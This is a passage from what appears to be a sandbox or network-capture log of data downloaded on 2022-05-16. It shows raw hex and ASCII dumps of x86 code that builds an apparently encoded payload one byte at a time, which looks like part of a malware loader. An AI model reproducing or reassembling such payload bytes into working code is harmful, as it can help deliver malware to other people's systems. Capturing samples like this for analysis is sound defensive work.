2022-05-16 08:29:53 UTC	3325	IN	Data Raw: fa ff 64 c6 85 8d 5c fa ff d8 c6 85 8e 5c fa ff 58 c6 85 8f 5c fa ff d0 c6 85 90 5c fa ff 82 c6 85 91 5c fa ff 53 c6 85 92 5c fa ff 61 c6 85 93 5c fa ff 6c c6 85 94 5c fa ff fc c6 85 95 5c fa ff 85 c6 85 96 5c fa ff cd c6 85 97 5c fa ff 39 c6 85 98 5c fa ff 7a c6 85 99 5c fa ff 67 c6 85 9a 5c fa ff 8d c6 85 9b 5c fa ff ca c6 85 9c 5c fa ff db c6 85 9d 5c fa ff 07 c6 85 9e 5c fa ff 93 c6 85 9f 5c fa ff 4f c6 85 a0 5c fa ff dc c6 85 a1 5c fa ff 81 c6 85 a2 5c fa ff 64 c6 85 a3 5c fa ff f6 c6 85 a4 5c fa ff 67 c6 85 a5 5c fa ff 3a c6 85 a6 5c fa ff 20 c6 85 a7 5c fa ff ac c6 85 a8 5c fa ff d6 c6 85 a9 5c fa ff 5f c6 85 aa 5c fa ff b0 c6 85 ab 5c fa ff 23 c6 85 ac 5c fa ff 81 c6 85 ad 5c fa ff 53 c6 85 ae 5c fa ff 4d c6 85 af 5c fa ff 3a c6 85 b0 5c fa ff 8d Data Ascii: d\\X\\\S\a\l\\\\9\z\g\\\\\\O\\\d\\g\:\ \\\_\\#\\S\M\:\
2022-05-16 08:29:53 UTC	3341	IN	Data Raw: 85 b1 65 fa ff 6d c6 85 b2 65 fa ff 60 c6 85 b3 65 fa ff 82 c6 85 b4 65 fa ff 64 c6 85 b5 65 fa ff ad c6 85 b6 65 fa ff 97 c6 85 b7 65 fa ff e4 c6 85 b8 65 fa ff 4d c6 85 b9 65 fa ff ef c6 85 ba 65 fa ff 3e c6 85 bb 65 fa ff 74 c6 85 bc 65 fa ff 75 c6 85 bd 65 fa ff 07 c6 85 be 65 fa ff 27 c6 85 bf 65 fa ff ab c6 85 c0 65 fa ff 82 c6 85 c1 65 fa ff 52 c6 85 c2 65 fa ff ba c6 85 c3 65 fa ff 35 c6 85 c4 65 fa ff 91 c6 85 c5 65 fa ff ee c6 85 c6 65 fa ff 00 c6 85 c7 65 fa ff 54 c6 85 c8 65 fa ff db c6 85 c9 65 fa ff 0c c6 85 ca 65 fa ff 0e c6 85 cb 65 fa ff 89 c6 85 cc 65 fa ff 2c c6 85 cd 65 fa ff ae c6 85 ce 65 fa ff c9 c6 85 cf 65 fa ff 61 c6 85 d0 65 fa ff 27 c6 85 d1 65 fa ff ef c6 85 d2 65 fa ff 79 c6 85 d3 65 fa ff 50 c6 85 d4 65 fa ff d0 c6 85 d5 65 Data Ascii: eme`eedeeeeMee>eteuee'eeeRee5eeeeTeeeee,eeeae'eeyePee
2022-05-16 08:29:53 UTC	3357	IN	Data Raw: ff c3 c6 85 d6 6e fa ff d7 c6 85 d7 6e fa ff bb c6 85 d8 6e fa ff 90 c6 85 d9 6e fa ff ab c6 85 da 6e fa ff 97 c6 85 db 6e fa ff 27 c6 85 dc 6e fa ff 94 c6 85 dd 6e fa ff 8d c6 85 de 6e fa ff 1f c6 85 df 6e fa ff 9b c6 85 e0 6e fa ff 30 c6 85 e1 6e fa ff a4 c6 85 e2 6e fa ff 2d c6 85 e3 6e fa ff d8 c6 85 e4 6e fa ff cd c6 85 e5 6e fa ff 53 c6 85 e6 6e fa ff 1c c6 85 e7 6e fa ff 6b c6 85 e8 6e fa ff d4 c6 85 e9 6e fa ff 97 c6 85 ea 6e fa ff 97 c6 85 eb 6e fa ff 6d c6 85 ec 6e fa ff 06 c6 85 ed 6e fa ff 12 c6 85 ee 6e fa ff 85 c6 85 ef 6e fa ff 85 c6 85 f0 6e fa ff db c6 85 f1 6e fa ff 7a c6 85 f2 6e fa ff 94 c6 85 f3 6e fa ff 67 c6 85 f4 6e fa ff ce c6 85 f5 6e fa ff db c6 85 f6 6e fa ff 30 c6 85 f7 6e fa ff 8a c6 85 f8 6e fa ff 12 c6 85 f9 6e fa ff 32 c6 Data Ascii: nnnnnn'nnnnn0nn-nnnSnnknnnnmnnnnnnznngnnn0nnn2
2022-05-16 08:29:53 UTC	3373	IN	Data Raw: fa 77 fa ff 82 c6 85 fb 77 fa ff 24 c6 85 fc 77 fa ff 8f c6 85 fd 77 fa ff 06 c6 85 fe 77 fa ff 43 c6 85 ff 77 fa ff 6f c6 85 00 78 fa ff d8 c6 85 01 78 fa ff 63 c6 85 02 78 fa ff be c6 85 03 78 fa ff 5c c6 85 04 78 fa ff 98 c6 85 05 78 fa ff e4 c6 85 06 78 fa ff c6 c6 85 07 78 fa ff 29 c6 85 08 78 fa ff 5f c6 85 09 78 fa ff 43 c6 85 0a 78 fa ff 63 c6 85 0b 78 fa ff 54 c6 85 0c 78 fa ff 0a c6 85 0d 78 fa ff 09 c6 85 0e 78 fa ff c5 c6 85 0f 78 fa ff a3 c6 85 10 78 fa ff 20 c6 85 11 78 fa ff c6 c6 85 12 78 fa ff 8f c6 85 13 78 fa ff 28 c6 85 14 78 fa ff b0 c6 85 15 78 fa ff c1 c6 85 16 78 fa ff 09 c6 85 17 78 fa ff ca c6 85 18 78 fa ff ab c6 85 19 78 fa ff 72 c6 85 1a 78 fa ff d4 c6 85 1b 78 fa ff b9 c6 85 1c 78 fa ff c6 c6 85 1d 78 fa ff c3 c6 85 1e 78 fa Data Ascii: ww$wwwCwoxxcxx\xxxx)x_xCxcxTxxxxx xxx(xxxxxxrxxxxx
2022-05-16 08:29:53 UTC	3389	IN	Data Raw: 1c c6 85 1f 81 fa ff 98 c6 85 20 81 fa ff 3a c6 85 21 81 fa ff 46 c6 85 22 81 fa ff 82 c6 85 23 81 fa ff a1 c6 85 24 81 fa ff c2 c6 85 25 81 fa ff fc c6 85 26 81 fa ff dc c6 85 27 81 fa ff f6 c6 85 28 81 fa ff 64 c6 85 29 81 fa ff be c6 85 2a 81 fa ff d0 c6 85 2b 81 fa ff 93 c6 85 2c 81 fa ff 82 c6 85 2d 81 fa ff f1 c6 85 2e 81 fa ff c3 c6 85 2f 81 fa ff 5b c6 85 30 81 fa ff e1 c6 85 31 81 fa ff 85 c6 85 32 81 fa ff 50 c6 85 33 81 fa ff 9b c6 85 34 81 fa ff 4d c6 85 35 81 fa ff a3 c6 85 36 81 fa ff 05 c6 85 37 81 fa ff ca c6 85 38 81 fa ff 97 c6 85 39 81 fa ff 07 c6 85 3a 81 fa ff 60 c6 85 3b 81 fa ff 1e c6 85 3c 81 fa ff dc c6 85 3d 81 fa ff d8 c6 85 3e 81 fa ff 97 c6 85 3f 81 fa ff 10 c6 85 40 81 fa ff 01 c6 85 41 81 fa ff 3a c6 85 42 81 fa ff 97 c6 85 Data Ascii: :!F"#$%&'(d)*+,-./[012P34M56789:`;<=>?@A:B
2022-05-16 08:29:53 UTC	3405	IN	Data Raw: 8a fa ff 32 c6 85 44 8a fa ff db c6 85 45 8a fa ff f2 c6 85 46 8a fa ff 36 c6 85 47 8a fa ff d0 c6 85 48 8a fa ff 20 c6 85 49 8a fa ff 35 c6 85 4a 8a fa ff 61 c6 85 4b 8a fa ff f9 c6 85 4c 8a fa ff a5 c6 85 4d 8a fa ff 0d c6 85 4e 8a fa ff cd c6 85 4f 8a fa ff 24 c6 85 50 8a fa ff f2 c6 85 51 8a fa ff 01 c6 85 52 8a fa ff 6b c6 85 53 8a fa ff 7d c6 85 54 8a fa ff 82 c6 85 55 8a fa ff 37 c6 85 56 8a fa ff c2 c6 85 57 8a fa ff 29 c6 85 58 8a fa ff 90 c6 85 59 8a fa ff ab c6 85 5a 8a fa ff c6 c6 85 5b 8a fa ff 54 c6 85 5c 8a fa ff 58 c6 85 5d 8a fa ff 6b c6 85 5e 8a fa ff 71 c6 85 5f 8a fa ff 0e c6 85 60 8a fa ff 5e c6 85 61 8a fa ff 75 c6 85 62 8a fa ff b0 c6 85 63 8a fa ff ab c6 85 64 8a fa ff 6f c6 85 65 8a fa ff c6 c6 85 66 8a fa ff f2 c6 85 67 8a fa ff Data Ascii: 2DEF6GH I5JaKLMNO$PQRkS}TU7VW)XYZ[T\X]k^q_`^aubcdoefg
2022-05-16 08:29:53 UTC	3421	IN	Data Raw: c6 85 68 93 fa ff a5 c6 85 69 93 fa ff 27 c6 85 6a 93 fa ff 81 c6 85 6b 93 fa ff ac c6 85 6c 93 fa ff ef c6 85 6d 93 fa ff c5 c6 85 6e 93 fa ff d4 c6 85 6f 93 fa ff 31 c6 85 70 93 fa ff 64 c6 85 71 93 fa ff 74 c6 85 72 93 fa ff 60 c6 85 73 93 fa ff ed c6 85 74 93 fa ff 32 c6 85 75 93 fa ff 09 c6 85 76 93 fa ff 82 c6 85 77 93 fa ff dc c6 85 78 93 fa ff c5 c6 85 79 93 fa ff d4 c6 85 7a 93 fa ff ce c6 85 7b 93 fa ff ac c6 85 7c 93 fa ff 30 c6 85 7d 93 fa ff c2 c6 85 7e 93 fa ff a5 c6 85 7f 93 fa ff 9b c6 85 80 93 fa ff cd c6 85 81 93 fa ff f1 c6 85 82 93 fa ff be c6 85 83 93 fa ff 5c c6 85 84 93 fa ff c9 c6 85 85 93 fa ff 97 c6 85 86 93 fa ff 0a c6 85 87 93 fa ff cf c6 85 88 93 fa ff 31 c6 85 89 93 fa ff d6 c6 85 8a 93 fa ff 0d c6 85 8b 93 fa ff 85 c6 85 8c Data Ascii: hi'jklmno1pdqtr`st2uvwxyz{\|0}~\1
2022-05-16 08:29:53 UTC	3437	IN	Data Raw: fa ff 24 c6 85 8d 9c fa ff 29 c6 85 8e 9c fa ff 3d c6 85 8f 9c fa ff 19 c6 85 90 9c fa ff 2b c6 85 91 9c fa ff 90 c6 85 92 9c fa ff 7d c6 85 93 9c fa ff f6 c6 85 94 9c fa ff 76 c6 85 95 9c fa ff a3 c6 85 96 9c fa ff 2c c6 85 97 9c fa ff 68 c6 85 98 9c fa ff 70 c6 85 99 9c fa ff 71 c6 85 9a 9c fa ff bc c6 85 9b 9c fa ff d8 c6 85 9c 9c fa ff 90 c6 85 9d 9c fa ff ca c6 85 9e 9c fa ff e3 c6 85 9f 9c fa ff f1 c6 85 a0 9c fa ff f2 c6 85 a1 9c fa ff e0 c6 85 a2 9c fa ff 68 c6 85 a3 9c fa ff 70 c6 85 a4 9c fa ff 71 c6 85 a5 9c fa ff 8b c6 85 a6 9c fa ff 9c c6 85 a7 9c fa ff 32 c6 85 a8 9c fa ff 7d c6 85 a9 9c fa ff b5 c6 85 aa 9c fa ff 3a c6 85 ab 9c fa ff 01 c6 85 ac 9c fa ff 7d c6 85 ad 9c fa ff 0e c6 85 ae 9c fa ff 6d c6 85 af 9c fa ff 27 c6 85 b0 9c fa ff 52 Data Ascii: $)=+}v,hpqhpq2}:}m'R
2022-05-16 08:29:53 UTC	3453	IN	Data Raw: 85 b1 a5 fa ff d0 c6 85 b2 a5 fa ff 7d c6 85 b3 a5 fa ff ac c6 85 b4 a5 fa ff 9e c6 85 b5 a5 fa ff 6c c6 85 b6 a5 fa ff 03 c6 85 b7 a5 fa ff 7a c6 85 b8 a5 fa ff 32 c6 85 b9 a5 fa ff 39 c6 85 ba a5 fa ff 85 c6 85 bb a5 fa ff 98 c6 85 bc a5 fa ff 72 c6 85 bd a5 fa ff ca c6 85 be a5 fa ff 24 c6 85 bf a5 fa ff f8 c6 85 c0 a5 fa ff 6c c6 85 c1 a5 fa ff 4f c6 85 c2 a5 fa ff 23 c6 85 c3 a5 fa ff 7e c6 85 c4 a5 fa ff 9b c6 85 c5 a5 fa ff f6 c6 85 c6 a5 fa ff 98 c6 85 c7 a5 fa ff c5 c6 85 c8 a5 fa ff df c6 85 c9 a5 fa ff ac c6 85 ca a5 fa ff 29 c6 85 cb a5 fa ff a0 c6 85 cc a5 fa ff 4f c6 85 cd a5 fa ff 23 c6 85 ce a5 fa ff 7e c6 85 cf a5 fa ff ac c6 85 d0 a5 fa ff b2 c6 85 d1 a5 fa ff 3a c6 85 d2 a5 fa ff 72 c6 85 d3 a5 fa ff 89 c6 85 d4 a5 fa ff 68 c6 85 d5 a5 Data Ascii: }lz29r$lO#~)O#~:rh
2022-05-16 08:29:53 UTC	3469	IN	Data Raw: ff 7d c6 85 d6 ae fa ff dc c6 85 d7 ae fa ff c9 c6 85 d8 ae fa ff 94 c6 85 d9 ae fa ff 1b c6 85 da ae fa ff f5 c6 85 db ae fa ff 8b c6 85 dc ae fa ff 3d c6 85 dd ae fa ff 8b c6 85 de ae fa ff cd c6 85 df ae fa ff 63 c6 85 e0 ae fa ff 24 c6 85 e1 ae fa ff 54 c6 85 e2 ae fa ff 3a c6 85 e3 ae fa ff 36 c6 85 e4 ae fa ff b9 c6 85 e5 ae fa ff ca c6 85 e6 ae fa ff 29 c6 85 e7 ae fa ff 8a c6 85 e8 ae fa ff 03 c6 85 e9 ae fa ff ab c6 85 ea ae fa ff 63 c6 85 eb ae fa ff 68 c6 85 ec ae fa ff 0d c6 85 ed ae fa ff 76 c6 85 ee ae fa ff 94 c6 85 ef ae fa ff ca c6 85 f0 ae fa ff ca c6 85 f1 ae fa ff 9e c6 85 f2 ae fa ff 9f c6 85 f3 ae fa ff 8b c6 85 f4 ae fa ff 7a c6 85 f5 ae fa ff af c6 85 f6 ae fa ff 68 c6 85 f7 ae fa ff 0d c6 85 f8 ae fa ff 76 c6 85 f9 ae fa ff a3 c6 Data Ascii: }=c$T:6)chvzhv
2022-05-16 08:29:53 UTC	3485	IN	Data Raw: fa b7 fa ff 06 c6 85 fb b7 fa ff 37 c6 85 fc b7 fa ff 1a c6 85 fd b7 fa ff 48 c6 85 fe b7 fa ff 18 c6 85 ff b7 fa ff 1d c6 85 00 b8 fa ff 86 c6 85 01 b8 fa ff ef c6 85 02 b8 fa ff e1 c6 85 03 b8 fa ff 38 c6 85 04 b8 fa ff bd c6 85 05 b8 fa ff b5 c6 85 06 b8 fa ff 1d c6 85 07 b8 fa ff dc c6 85 08 b8 fa ff 88 c6 85 09 b8 fa ff 02 c6 85 0a b8 fa ff 04 c6 85 0b b8 fa ff 0b c6 85 0c b8 fa ff 1a c6 85 0d b8 fa ff 01 c6 85 0e b8 fa ff d6 c6 85 0f b8 fa ff 9d c6 85 10 b8 fa ff 08 c6 85 11 b8 fa ff ea c6 85 12 b8 fa ff 40 c6 85 13 b8 fa ff f0 c6 85 14 b8 fa ff 08 c6 85 15 b8 fa ff 13 c6 85 16 b8 fa ff 42 c6 85 17 b8 fa ff 0b c6 85 18 b8 fa ff 82 c6 85 19 b8 fa ff e3 c6 85 1a b8 fa ff 8e c6 85 1b b8 fa ff 9f c6 85 1c b8 fa ff ff c6 85 1d b8 fa ff c3 c6 85 1e b8 fa Data Ascii: 7H8@B
2022-05-16 08:29:53 UTC	3501	IN	Data Raw: c9 c6 85 1f c1 fa ff 2c c6 85 20 c1 fa ff 09 c6 85 21 c1 fa ff e8 c6 85 22 c1 fa ff 58 c6 85 23 c1 fa ff 7d c6 85 24 c1 fa ff 02 c6 85 25 c1 fa ff 16 c6 85 26 c1 fa ff 78 c6 85 27 c1 fa ff 55 c6 85 28 c1 fa ff d4 c6 85 29 c1 fa ff a5 c6 85 2a c1 fa ff 0b c6 85 2b c1 fa ff fe c6 85 2c c1 fa ff 45 c6 85 2d c1 fa ff 59 c6 85 2e c1 fa ff c7 c6 85 2f c1 fa ff 01 c6 85 30 c1 fa ff 7d c6 85 31 c1 fa ff 6f c6 85 32 c1 fa ff a7 c6 85 33 c1 fa ff a3 c6 85 34 c1 fa ff be c6 85 35 c1 fa ff db c6 85 36 c1 fa ff d2 c6 85 37 c1 fa ff 1d c6 85 38 c1 fa ff 25 c6 85 39 c1 fa ff 04 c6 85 3a c1 fa ff 4e c6 85 3b c1 fa ff b1 c6 85 3c c1 fa ff a2 c6 85 3d c1 fa ff 98 c6 85 3e c1 fa ff b3 c6 85 3f c1 fa ff d0 c6 85 40 c1 fa ff a4 c6 85 41 c1 fa ff 60 c6 85 42 c1 fa ff 10 c6 85 Data Ascii: , !"X#}$%&x'U()*+,E-Y./0}1o2345678%9:N;<=>?@A`B
2022-05-16 08:29:53 UTC	3517	IN	Data Raw: ca fa ff 5c c6 85 44 ca fa ff af c6 85 45 ca fa ff c4 c6 85 46 ca fa ff 9a c6 85 47 ca fa ff 18 c6 85 48 ca fa ff 70 c6 85 49 ca fa ff c3 c6 85 4a ca fa ff 82 c6 85 4b ca fa ff a8 c6 85 4c ca fa ff 5d c6 85 4d ca fa ff a3 c6 85 4e ca fa ff 21 c6 85 4f ca fa ff 08 c6 85 50 ca fa ff 3f c6 85 51 ca fa ff 0e c6 85 52 ca fa ff 03 c6 85 53 ca fa ff 5a c6 85 54 ca fa ff ab c6 85 55 ca fa ff ce c6 85 56 ca fa ff 82 c6 85 57 ca fa ff 0f c6 85 58 ca fa ff ca c6 85 59 ca fa ff 9b c6 85 5a ca fa ff 6e c6 85 5b ca fa ff f4 c6 85 5c ca fa ff b4 c6 85 5d ca fa ff 18 c6 85 5e ca fa ff 22 c6 85 5f ca fa ff 23 c6 85 60 ca fa ff 69 c6 85 61 ca fa ff 92 c6 85 62 ca fa ff c9 c6 85 63 ca fa ff 89 c6 85 64 ca fa ff eb c6 85 65 ca fa ff a2 c6 85 66 ca fa ff 71 c6 85 67 ca fa ff Data Ascii: \DEFGHpIJKL]MN!OP?QRSZTUVWXYZn[\]^"_#`iabcdefqg
2022-05-16 08:29:53 UTC	3533	IN	Data Raw: c6 85 68 d3 fa ff 26 c6 85 69 d3 fa ff 63 c6 85 6a d3 fa ff 62 c6 85 6b d3 fa ff 08 c6 85 6c d3 fa ff db c6 85 6d d3 fa ff 1b c6 85 6e d3 fa ff ea c6 85 6f d3 fa ff 74 c6 85 70 d3 fa ff 03 c6 85 71 d3 fa ff cb c6 85 72 d3 fa ff cc c6 85 73 d3 fa ff e7 c6 85 74 d3 fa ff 0d c6 85 75 d3 fa ff 2e c6 85 76 d3 fa ff 7b c6 85 77 d3 fa ff a4 c6 85 78 d3 fa ff 46 c6 85 79 d3 fa ff 80 c6 85 7a d3 fa ff 84 c6 85 7b d3 fa ff bd c6 85 7c d3 fa ff 70 c6 85 7d d3 fa ff f2 c6 85 7e d3 fa ff da c6 85 7f d3 fa ff 6a c6 85 80 d3 fa ff 82 c6 85 81 d3 fa ff d0 c6 85 82 d3 fa ff 68 c6 85 83 d3 fa ff 2b c6 85 84 d3 fa ff 27 c6 85 85 d3 fa ff 92 c6 85 86 d3 fa ff a0 c6 85 87 d3 fa ff 67 c6 85 88 d3 fa ff c3 c6 85 89 d3 fa ff 8c c6 85 8a d3 fa ff 65 c6 85 8b d3 fa ff 66 c6 85 8c Data Ascii: h&icjbklmnotpqrstu.v{wxFyz{\|p}~jh+'gef
2022-05-16 08:29:53 UTC	3549	IN	Data Raw: fa ff 79 c6 85 8d dc fa ff 27 c6 85 8e dc fa ff 21 c6 85 8f dc fa ff 19 c6 85 90 dc fa ff 3b c6 85 91 dc fa ff cb c6 85 92 dc fa ff 3b c6 85 93 dc fa ff f0 c6 85 94 dc fa ff e3 c6 85 95 dc fa ff 98 c6 85 96 dc fa ff 8d c6 85 97 dc fa ff 32 c6 85 98 dc fa ff ad c6 85 99 dc fa ff e9 c6 85 9a dc fa ff b6 c6 85 9b dc fa ff 4f c6 85 9c dc fa ff 07 c6 85 9d dc fa ff c6 c6 85 9e dc fa ff 73 c6 85 9f dc fa ff fc c6 85 a0 dc fa ff 0d c6 85 a1 dc fa ff 92 c6 85 a2 dc fa ff 7d c6 85 a3 dc fa ff 46 c6 85 a4 dc fa ff b7 c6 85 a5 dc fa ff 17 c6 85 a6 dc fa ff 3a c6 85 a7 dc fa ff 4a c6 85 a8 dc fa ff 47 c6 85 a9 dc fa ff 08 c6 85 aa dc fa ff 86 c6 85 ab dc fa ff 5c c6 85 ac dc fa ff fa c6 85 ad dc fa ff 78 c6 85 ae dc fa ff 69 c6 85 af dc fa ff b0 c6 85 b0 dc fa ff 14 Data Ascii: y'!;;2Os}F:JG\xi
2022-05-16 08:29:53 UTC	3565	IN	Data Raw: 85 b1 e5 fa ff 23 c6 85 b2 e5 fa ff 2a c6 85 b3 e5 fa ff 9b c6 85 b4 e5 fa ff 59 c6 85 b5 e5 fa ff a3 c6 85 b6 e5 fa ff 7e c6 85 b7 e5 fa ff 3d c6 85 b8 e5 fa ff 7a c6 85 b9 e5 fa ff 16 c6 85 ba e5 fa ff 05 c6 85 bb e5 fa ff 85 c6 85 bc e5 fa ff 8d c6 85 bd e5 fa ff f4 c6 85 be e5 fa ff ff c6 85 bf e5 fa ff 86 c6 85 c0 e5 fa ff 15 c6 85 c1 e5 fa ff bd c6 85 c2 e5 fa ff 7e c6 85 c3 e5 fa ff da c6 85 c4 e5 fa ff 3d c6 85 c5 e5 fa ff 92 c6 85 c6 e5 fa ff 59 c6 85 c7 e5 fa ff da c6 85 c8 e5 fa ff b4 c6 85 c9 e5 fa ff 35 c6 85 ca e5 fa ff f6 c6 85 cb e5 fa ff 84 c6 85 cc e5 fa ff 19 c6 85 cd e5 fa ff 79 c6 85 ce e5 fa ff 87 c6 85 cf e5 fa ff 89 c6 85 d0 e5 fa ff c7 c6 85 d1 e5 fa ff ab c6 85 d2 e5 fa ff 58 c6 85 d3 e5 fa ff dc c6 85 d4 e5 fa ff 05 c6 85 d5 e5 Data Ascii: #*Y~=z~=Y5yX
2022-05-16 08:29:53 UTC	3581	IN	Data Raw: ff f6 c6 85 d6 ee fa ff 82 c6 85 d7 ee fa ff 9b c6 85 d8 ee fa ff 3a c6 85 d9 ee fa ff 56 c6 85 da ee fa ff 4d c6 85 db ee fa ff 71 c6 85 dc ee fa ff 71 c6 85 dd ee fa ff 9e c6 85 de ee fa ff 12 c6 85 df ee fa ff 61 c6 85 e0 ee fa ff a0 c6 85 e1 ee fa ff fb c6 85 e2 ee fa ff 64 c6 85 e3 ee fa ff 4c c6 85 e4 ee fa ff f9 c6 85 e5 ee fa ff 71 c6 85 e6 ee fa ff 17 c6 85 e7 ee fa ff 11 c6 85 e8 ee fa ff 77 c6 85 e9 ee fa ff 8e c6 85 ea ee fa ff 07 c6 85 eb ee fa ff f7 c6 85 ec ee fa ff 7d c6 85 ed ee fa ff 94 c6 85 ee ee fa ff b1 c6 85 ef ee fa ff 67 c6 85 f0 ee fa ff 15 c6 85 f1 ee fa ff 9c c6 85 f2 ee fa ff 87 c6 85 f3 ee fa ff b4 c6 85 f4 ee fa ff 1b c6 85 f5 ee fa ff 93 c6 85 f6 ee fa ff 7a c6 85 f7 ee fa ff 85 c6 85 f8 ee fa ff 05 c6 85 f9 ee fa ff 78 c6 Data Ascii: :VMqqadLqw}gzx
2022-05-16 08:29:53 UTC	3597	IN	Data Raw: fa f7 fa ff 3f c6 85 fb f7 fa ff e5 c6 85 fc f7 fa ff e7 c6 85 fd f7 fa ff 97 c6 85 fe f7 fa ff cc c6 85 ff f7 fa ff aa c6 85 00 f8 fa ff e1 c6 85 01 f8 fa ff 74 c6 85 02 f8 fa ff 6c c6 85 03 f8 fa ff a4 c6 85 04 f8 fa ff 71 c6 85 05 f8 fa ff 3a c6 85 06 f8 fa ff 83 c6 85 07 f8 fa ff 78 c6 85 08 f8 fa ff 29 c6 85 09 f8 fa ff 12 c6 85 0a f8 fa ff 89 c6 85 0b f8 fa ff 5c c6 85 0c f8 fa ff 64 c6 85 0d f8 fa ff e3 c6 85 0e f8 fa ff a0 c6 85 0f f8 fa ff 39 c6 85 10 f8 fa ff 37 c6 85 11 f8 fa ff 94 c6 85 12 f8 fa ff b4 c6 85 13 f8 fa ff 9a c6 85 14 f8 fa ff 0b c6 85 15 f8 fa ff b9 c6 85 16 f8 fa ff 4e c6 85 17 f8 fa ff e1 c6 85 18 f8 fa ff 68 c6 85 19 f8 fa ff f8 c6 85 1a f8 fa ff 35 c6 85 1b f8 fa ff af c6 85 1c f8 fa ff bc c6 85 1d f8 fa ff 7a c6 85 1e f8 fa Data Ascii: ?tlq:x)\d97Nh5z
2022-05-16 08:29:53 UTC	3613	IN	Data Raw: 56 c6 85 1f 01 fb ff 69 c6 85 20 01 fb ff 6d c6 85 21 01 fb ff 5a c6 85 22 01 fb ff ba c6 85 23 01 fb ff 42 c6 85 24 01 fb ff 5f c6 85 25 01 fb ff 0f c6 85 26 01 fb ff 64 c6 85 27 01 fb ff 1c c6 85 28 01 fb ff b1 c6 85 29 01 fb ff 60 c6 85 2a 01 fb ff 52 c6 85 2b 01 fb ff a0 c6 85 2c 01 fb ff cf c6 85 2d 01 fb ff b6 c6 85 2e 01 fb ff fe c6 85 2f 01 fb ff f5 c6 85 30 01 fb ff c9 c6 85 31 01 fb ff 11 c6 85 32 01 fb ff 36 c6 85 33 01 fb ff ee c6 85 34 01 fb ff 3c c6 85 35 01 fb ff b0 c6 85 36 01 fb ff e5 c6 85 37 01 fb ff 1b c6 85 38 01 fb ff 07 c6 85 39 01 fb ff 6e c6 85 3a 01 fb ff d3 c6 85 3b 01 fb ff 7f c6 85 3c 01 fb ff d4 c6 85 3d 01 fb ff e1 c6 85 3e 01 fb ff d7 c6 85 3f 01 fb ff e4 c6 85 40 01 fb ff aa c6 85 41 01 fb ff 4c c6 85 42 01 fb ff 67 c6 85 Data Ascii: Vi m!Z"#B$_%&d'()`*R+,-./012634<56789n:;<=>?@ALBg
2022-05-16 08:29:53 UTC	3629	IN	Data Raw: 0a fb ff 54 c6 85 44 0a fb ff a4 c6 85 45 0a fb ff 74 c6 85 46 0a fb ff ea c6 85 47 0a fb ff 9e c6 85 48 0a fb ff 4c c6 85 49 0a fb ff 09 c6 85 4a 0a fb ff 2b c6 85 4b 0a fb ff fe c6 85 4c 0a fb ff 18 c6 85 4d 0a fb ff b1 c6 85 4e 0a fb ff 57 c6 85 4f 0a fb ff d7 c6 85 50 0a fb ff b9 c6 85 51 0a fb ff 02 c6 85 52 0a fb ff 71 c6 85 53 0a fb ff af c6 85 54 0a fb ff ed c6 85 55 0a fb ff 2f c6 85 56 0a fb ff ad c6 85 57 0a fb ff 10 c6 85 58 0a fb ff 1e c6 85 59 0a fb ff 2e c6 85 5a 0a fb ff f1 c6 85 5b 0a fb ff 43 c6 85 5c 0a fb ff 7d c6 85 5d 0a fb ff ae c6 85 5e 0a fb ff 13 c6 85 5f 0a fb ff e3 c6 85 60 0a fb ff ea c6 85 61 0a fb ff 24 c6 85 62 0a fb ff 29 c6 85 63 0a fb ff 7e c6 85 64 0a fb ff dc c6 85 65 0a fb ff 49 c6 85 66 0a fb ff 26 c6 85 67 0a fb ff Data Ascii: TDEtFGHLIJ+KLMNWOPQRqSTU/VWXY.Z[C\}]^_`a$b)c~deIf&g
2022-05-16 08:29:53 UTC	3645	IN	Data Raw: c6 85 68 13 fb ff b8 c6 85 69 13 fb ff 89 c6 85 6a 13 fb ff d4 c6 85 6b 13 fb ff f1 c6 85 6c 13 fb ff 12 c6 85 6d 13 fb ff 78 c6 85 6e 13 fb ff 0c c6 85 6f 13 fb ff 93 c6 85 70 13 fb ff 27 c6 85 71 13 fb ff df c6 85 72 13 fb ff 2c c6 85 73 13 fb ff 03 c6 85 74 13 fb ff 3b c6 85 75 13 fb ff 3a c6 85 76 13 fb ff 6b c6 85 77 13 fb ff db c6 85 78 13 fb ff df c6 85 79 13 fb ff 13 c6 85 7a 13 fb ff 5b c6 85 7b 13 fb ff 9c c6 85 7c 13 fb ff 16 c6 85 7d 13 fb ff 9c c6 85 7e 13 fb ff af c6 85 7f 13 fb ff e0 c6 85 80 13 fb ff 6f c6 85 81 13 fb ff 4c c6 85 82 13 fb ff 48 c6 85 83 13 fb ff 25 c6 85 84 13 fb ff 72 c6 85 85 13 fb ff b9 c6 85 86 13 fb ff 5e c6 85 87 13 fb ff ad c6 85 88 13 fb ff 6c c6 85 89 13 fb ff 0e c6 85 8a 13 fb ff 27 c6 85 8b 13 fb ff 43 c6 85 8c Data Ascii: hijklmxnop'qr,st;u:vkwxyz[{\|}~oLH%r^l'C
2022-05-16 08:29:53 UTC	3661	IN	Data Raw: fb ff e9 c6 85 8d 1c fb ff e0 c6 85 8e 1c fb ff 82 c6 85 8f 1c fb ff 0e c6 85 90 1c fb ff 7b c6 85 91 1c fb ff de c6 85 92 1c fb ff 0d c6 85 93 1c fb ff 6c c6 85 94 1c fb ff fb c6 85 95 1c fb ff 75 c6 85 96 1c fb ff 98 c6 85 97 1c fb ff cf c6 85 98 1c fb ff 27 c6 85 99 1c fb ff 9c c6 85 9a 1c fb ff 41 c6 85 9b 1c fb ff b4 c6 85 9c 1c fb ff 77 c6 85 9d 1c fb ff 2c c6 85 9e 1c fb ff 38 c6 85 9f 1c fb ff 29 c6 85 a0 1c fb ff e8 c6 85 a1 1c fb ff 35 c6 85 a2 1c fb ff d8 c6 85 a3 1c fb ff 70 c6 85 a4 1c fb ff a5 c6 85 a5 1c fb ff be c6 85 a6 1c fb ff b1 c6 85 a7 1c fb ff f7 c6 85 a8 1c fb ff fb c6 85 a9 1c fb ff 69 c6 85 aa 1c fb ff 38 c6 85 ab 1c fb ff a3 c6 85 ac 1c fb ff 03 c6 85 ad 1c fb ff 1a c6 85 ae 1c fb ff de c6 85 af 1c fb ff 22 c6 85 b0 1c fb ff 08 Data Ascii: {lu'Aw,8)5pi8"
